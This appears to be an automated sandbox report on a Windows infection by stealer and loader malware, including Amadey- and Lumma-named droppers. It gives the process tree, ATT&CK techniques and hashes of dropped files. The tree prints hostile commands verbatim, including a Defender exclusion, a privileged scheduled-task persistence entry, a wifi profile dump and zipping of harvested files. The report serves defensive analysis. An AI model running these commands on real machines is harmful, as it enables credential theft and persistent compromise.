C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100083~1\osminog.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100083~1\osminog.exeC:\Users\Admin\AppData\Local\Temp\100083~1\osminog.exe3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100083~2\GOLDPR~1.EXE"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100083~2\GOLDPR~1.EXEC:\Users\Admin\AppData\Local\Temp\100083~2\GOLDPR~1.EXE3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main2⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main3⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main4⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main2⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main3⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100083~3\judith.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100083~3\judith.exeC:\Users\Admin\AppData\Local\Temp\100083~3\judith.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\onefile_3724_133545581255096684\stub.exeC:\Users\Admin\AppData\Local\Temp\100083~3\judith.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer6⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100085~1\ALEX12~1.EXE"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100085~1\ALEX12~1.EXEC:\Users\Admin\AppData\Local\Temp\100085~1\ALEX12~1.EXE3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\olehpsp.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\CONFIG~1\olehpsp.exeC:\Users\Admin\AppData\Roaming\CONFIG~1\olehpsp.exe6⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\TWO.exe"5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100084~1\AMADEY~1.EXE"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100084~1\AMADEY~1.EXEC:\Users\Admin\AppData\Local\Temp\100084~1\AMADEY~1.EXE3⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100086~1\dais.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100086~1\dais.exeC:\Users\Admin\AppData\Local\Temp\100086~1\dais.exe3⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100087~1\lastrovs.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100087~1\lastrovs.exeC:\Users\Admin\AppData\Local\Temp\100087~1\lastrovs.exe3⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100087~2\Reload.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100087~2\Reload.exeC:\Users\Admin\AppData\Local\Temp\100087~2\Reload.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 12964⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100087~3\random.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100087~3\random.exeC:\Users\Admin\AppData\Local\Temp\100087~3\random.exe3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000874021\random.cmd" "2⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\107415~1\amadka.exe"2⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100090~1\LUMMAH~1.EXE"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100090~1\LUMMAH~1.EXEC:\Users\Admin\AppData\Local\Temp\100090~1\LUMMAH~1.EXE3⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100090~2\FILE30~1.EXE"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100090~2\FILE30~1.EXEC:\Users\Admin\AppData\Local\Temp\100090~2\FILE30~1.EXE3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\Pictures\IYHDRY~1.EXE"5⤵
-
C:\Users\Admin\Pictures\IYHDRY~1.EXEC:\Users\Admin\Pictures\IYHDRY~1.EXE6⤵
-
C:\Users\Admin\AppData\Local\Temp\wfplwfs.exeC:\Users\Admin\AppData\Local\Temp\wfplwfs.exe7⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe8⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe8⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\Pictures\5KFUVH~1.EXE"5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\Pictures\NKCGTY~1.EXE"5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\Pictures\PT8EUN~1.EXE"5⤵
-
C:\Users\Admin\Pictures\PT8EUN~1.EXEC:\Users\Admin\Pictures\PT8EUN~1.EXE6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 2727⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\Pictures\VIDREY~1.EXE"5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\Pictures\UGRSWW~1.EXE"5⤵
-
C:\Users\Admin\Pictures\UGRSWW~1.EXEC:\Users\Admin\Pictures\UGRSWW~1.EXE6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 2727⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\Pictures\NITVOM~1.EXE"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100091~1\SWIZZY~1.EXE"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100091~1\SWIZZY~1.EXEC:\Users\Admin\AppData\Local\Temp\100091~1\SWIZZY~1.EXE3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100091~2\INSTAL~1.EXE"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100091~2\INSTAL~1.EXEC:\Users\Admin\AppData\Local\Temp\100091~2\INSTAL~1.EXE3⤵
-
C:\ProgramData\Chrome\CNSWA.exeC:\ProgramData\Chrome\CNSWA.exe1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn CNSWA /tr C:\ProgramData\Chrome\CNSWA.exe3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn CNSWA /tr C:\ProgramData\Chrome\CNSWA.exe4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100004~1\amert.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100004~1\amert.exeC:\Users\Admin\AppData\Local\Temp\100004~1\amert.exe3⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100005~1\random.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100005~1\random.exeC:\Users\Admin\AppData\Local\Temp\100005~1\random.exe3⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 5684 -ip 56841⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 908 -p 6892 -ip 68921⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 928 -p 3420 -ip 34201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 1300 -ip 13001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 6896 -ip 68961⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exeC:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 972 -p 6500 -ip 65001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 964 -p 6264 -ip 62641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 904 -p 6040 -ip 60401⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exeC:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6948 -ip 69481⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
3Windows Service
3Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
3Windows Service
3Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Defense Evasion
Modify Registry
4Impair Defenses
2Disable or Modify System Firewall
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Are.docxFilesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
C:\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
C:\ProgramData\resource-b.datFilesize
128B
MD50d6174e4525cfded5dd1c9440b9dc1e7
SHA1173ef30a035ce666278904625eadcfae09233a47
SHA256458677cdf0e1a4e87d32ab67d6a5eea9e67cb3545d79a21a0624e6bb5e1087e7
SHA51286da96385985a1ba3d67a8676a041ca563838f474df33d82b6ecd90c101703b30747121a6b7281e025a3c11ce28accedfc94db4e8d38e391199458056c2cd27a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datFilesize
40B
MD585cfc13b6779a099d53221876df3b9e0
SHA108becf601c986c2e9f979f9143bbbcb7b48540ed
SHA256bd34434d117b9572216229cb2ab703b5e98d588f5f6dfe072188bd3d6b3022f3
SHA512b248162930702450893a112987e96ea70569ac35e14ef5eb6973238e426428272d1c930ce30552f19dd2d8d7754dc1f7f667ecd18f2c857b165b7873f4c03a48
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD5d312f0ef47248a6863e6b1f4f926d58f
SHA11b5efd2cda8fc4f37332e1fd09206121a07eb14e
SHA25641d1e88038161c6f0c908f172e7bb25ebd2e4fb7ff487f67930b3042bb37e977
SHA5126f0ff6bf586d1bf7ca487f60fa6438151af781326ed443145888e834a7ef3261a99ef8ac3a84209ee0b4a3e317d6b94269f7a87b8733a37a327c8faaaf867676
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
539B
MD53bdb67e454cebc00c3310f7414bf84c4
SHA13dbdc293c4cff9fc803cde8778c4ec1b3aa8cc53
SHA25606ef86ebf4bbb8abdb00d3e6c6acd79e7d875b65244ea4cb56a9e2ce6734d1cf
SHA5123cfd34dbfe6df9645fc9005e8486dc47d3fc4eeaffc97b8af6c0ada82576516f9afd3910f1018e49bdb58f17ccfadb057cf6e14d8a7a78cf0ff01818a7f7ad19
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
707B
MD59a6adf2c317d0d9df08b96909adcb860
SHA1214fb4444969ceef181e15b43f38bcbcc9341a9a
SHA256acb96412350922f89b0212fd5a888a7d096d47320729ed128e8f55b9dfb37c0d
SHA512475aaf392b1a497e5b2ca2afad96a8d652f9d0a84ec8d8eeb02bd66b7252344fc50690b823a4ee1e9f11a1032b453ed4aa0ca4e734567c5c829ae2b994592197
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD5c72ed9b1842dfc6f7ecd2e49efe879a5
SHA1d09a5a6098235e52e97b8ed72b72cae77f9b4a0b
SHA25644a033406760e8128b80482409e93a9af01ce17128c7dbe8330767f4060a9cdb
SHA51217bdeeadc68e1f5d056d69ddc2d5d27cc7d9706d366727e7555ad57a68e9c2ded1531efdbcff03e34a2b98f0d41b56ded85209851be50885ea86966fc41fdd87
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5402893e8ac1a1a273adcd7db588db27a
SHA1fb229af94ff779739748ceeafe20f5cbb4121cbc
SHA25606d823e8a851854c0897d7aa756b03616d19f911105bdfd808f89bb4e0c1cb23
SHA512139296dec302f8325c2db0082409eb6efc36d199927dda154647d084129a5683d31f40287aa5c0b6ae84b954870f7332c0cc334f46002c59d23ab5b6af06448b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
257KB
MD51da3b8344f6a0edb70001292e2d1af7d
SHA10e563d1616e287dcfcb35f9305f5a9e065b6cd6c
SHA2560f59e46124afa06bc659a167095fb2c49e1ee4391c455a643d8fab8c5bf510c5
SHA51246b15433e11024495e703bd604d9cb7fa360c441ad8c7558e78f5d2e7157c953862b9479a67a5db063fb1850b50f934a70929117af71eb6961c62703d8ae2be1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
128KB
MD5566db34c55c49e9c1320fab19f971e88
SHA186635ec43c234483fd225700067d2405b1cdd5ca
SHA25627c92726a64219a69ca6496230b6606c17aa07f23e04e06c00ba68968f32c7e8
SHA51269a6c32caff42748f093cbcf43330508a48d7a4db2ca29718564e715cc4a47b225a47b3308cc24712e3a1be8021ce06fc5e634da02ce89b7618337344eb88b87
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
128KB
MD592a715f3d725d698d9fbc01a5520a7e0
SHA1fb1d8c0415f1a1b30d4efcffb1d2fe60333ace23
SHA256dee3f15e174a645b6bd247218b8fa057b4b2f79a96ae334a188100bf94ed227b
SHA512993cc8fe7b811d27f74096fa52a49d53aca4f81ee05e42bc96607c68b581f6475fe71289b04c6e51c5a29fbe3d2772de3fa10a4eed706735937f661838341fb8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
257KB
MD5b92b8d400b48c14d286e98d702febb7c
SHA121f2775c9fe77eae3603b59e43ee26a0fbbb7366
SHA2563e5bc5044c1ac2e61e296d4e9378cb4f4aa7ba7e82272e2aff19415c0c40ccd6
SHA5128b3ad5d1aa8b3beda97c890b72e451c9a042a4e9fcad2d349c2c5e4056a66ad845384aae499935e82fd509e448e36a9e2d065d04c1d355aa29789e4da1a7f3a3
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
128KB
MD595e675fcd7822bff55fc7edab9a944a7
SHA1e9a8e826aa71cb256b9cbc370e0b28d6914f8b54
SHA256597d142b1ebfb70c43311a6db6102a74d7c99781eaf67c04fd244c5e5251c2bd
SHA512486d5696f2bd7da1a8826c2d5980529775f6a1282c55e9c1b0a8e5fcbd19143c9c9c9d4aa034d9aac265b0398b6ba8fcbd07e83fd75117163c8401a309985cc9
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
280B
MD52d15e1531763438fabddeee1d2927080
SHA11a7f84c3afe500d5e864d6935ae6410344142575
SHA256ccc7c71398d0338db0ed8ff61275c9e7a3e71e7df9e5ce6da14393f43489e372
SHA5129fdd602bf5d674943c58be6fca120f4841c3598b8019de791460f507e3bec43d089b6d31152594c8b827f115aa6f81e7937782d6d5e7ed28d97772a585d5eae2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
280B
MD57cb0f3157dc13c197fe1081504a6d74a
SHA1d4b9381e824c60ef36542d285263e204ed65d58d
SHA2560846c285ff386f8b12baea3b53181e0b15ee5fea9bfbb5cacb9c9bb81bcaae5e
SHA512d13a023e3f6c4647acce1cab6cb22affb142d76bab927fbc8352eda5bd7a373bfd194a31228158bbbee494e2b0e9f7dd07190336cb541dd7ee1fcf2fe2845fb3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\51f1288c-4df7-4c19-9f43-8e6d865e35c3.tmpFilesize
1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
264B
MD5e057c58ae2f93f04eea954ad48eec9fe
SHA108f90a6b557be9913578831bfc79f28e527a1c70
SHA256f474150aab499262e153187b8d17f824957ea3ee86370fd5efc415325ed729f6
SHA5125063c2f07454d4f0df789ed74d21ebdbcba335dc3cbd6a41f76e1178101af607ee28f8a215d48d522812cec29320ec2370ef10c6eb403c42a0a3abd9e6f5b6e3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.jsonFilesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent StateFilesize
3KB
MD56d569be58a65be393d02000d0b4d4469
SHA1841788781046512588a0599d21dac344e4ce0905
SHA256b51b41f19109d934efa1f5ed994b8265c4f29af94c768d92f6560f84c9415974
SHA512913c77f6b2745a1f5dc12bcf1204de6f0530bf85166759e77d26d53070915f612f7ee0654925896b7c5684c7b2877df17c0bc2968ab7b79e1248f2544d45c0a1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD5622f1bbd4f0051bed1e469274976fa49
SHA18533646399c371bec1a818dfa06fa3d5296e302c
SHA25661df7cbf67205c13e23ccfb788c7241e940110fef9bdc32c82025a8bc4ca73ba
SHA512dc8ce3396c6d68c6f2050737db3b24df911fa9ab531f1d4285e67148030aad77ed7ecbd3111084f4a0bfe5b4c2c2d8713efea2e3ee9b532faa31dbabab38132d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch DictionariesFilesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurityFilesize
1KB
MD5235003c20786519fe58d61b8184db240
SHA1076a525ead46c8f40e3f646d636e4714ee64273e
SHA256873cb671f55ec10fafb24c950f9298ea2e6b7926f87da9d03c7f82a4c5bb8564
SHA512f7cbb5163185848dca8ad6eda88d74809bff873476b8b887ce815102f1e1e8f727a13cdcb2f9cf3e3bf64dcd2abccf05e9229206156db5bf98d4159440e05099
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
11KB
MD51c8ca7be600bc5f2e118cf4b577d2416
SHA1b1fd5c520f97762dbd177f92f013a2026bf7883a
SHA25655e6795f6f94e3f77dbd618b3f8bfc98a7c2bf6180b0585bea3f6bca1add1ff2
SHA51223a5411eeb477112156b0e4cd4922652d6908835d4659d831a70bff6c8037216b81addde1072576126e15d505a02a1bc8c1c2e06a7b3b189f2fad70f772fb2de
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure PreferencesFilesize
30KB
MD574ff5772a44336925f60f92cdb8ca428
SHA1756b184dabb5392c63cac8aa951ea125fe20403c
SHA2562cffac6fcfddae005cde8f6907ba68900bad434191a4e5713802187b30bb9c78
SHA51219a4bb126b3b8b7eea3990aac0f64f0f2346d4d9b7c2368718e2d66249d4c419fb366e8dbaaf28d9bdba91c73f393e9258bf41e75d2227fcc1f098a914093244
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
64KB
MD53f44acaaa94a249e2df67fba88bb6b56
SHA1708cdb56812f20a489e1b051b8a986035a77f292
SHA2566f76f558ed7d8593e7162fa7a59944bfea8306947cf6464e0602c235b4976d34
SHA512bb09e77397a3d082d4cb3c00685e6b1d6a4e161d22c24889ab9baa13e5a1aac6b0444410d9d7e1ca806a360cf83a733b04052b0e2361745cd579183ad7d31e15
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
61KB
MD5b8e1113312c2bee3b948d40025fdf1d6
SHA1821c25bcc0108c69cf477e4000bde75457be258d
SHA256f65bda27adbab0e712b625c8c83352896b91f062ceed309d3bd2358c81192155
SHA51249597dcf75b1a2da2ecd482e538ccb09d6f3ecd8eed589f1a9fc40929d0159811ef85dd1ad994a7f019d2e17686ac1920a46b7a3970afda7d875e250864835a5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD513e5260e039b147eeccccd0e4e68df21
SHA1882c8bfc8205ce8d216f82e3346bd4f494a87219
SHA256053467d5fec0ae72ff57512e1ce5289843f999da4e6cc55fcf883637961688fd
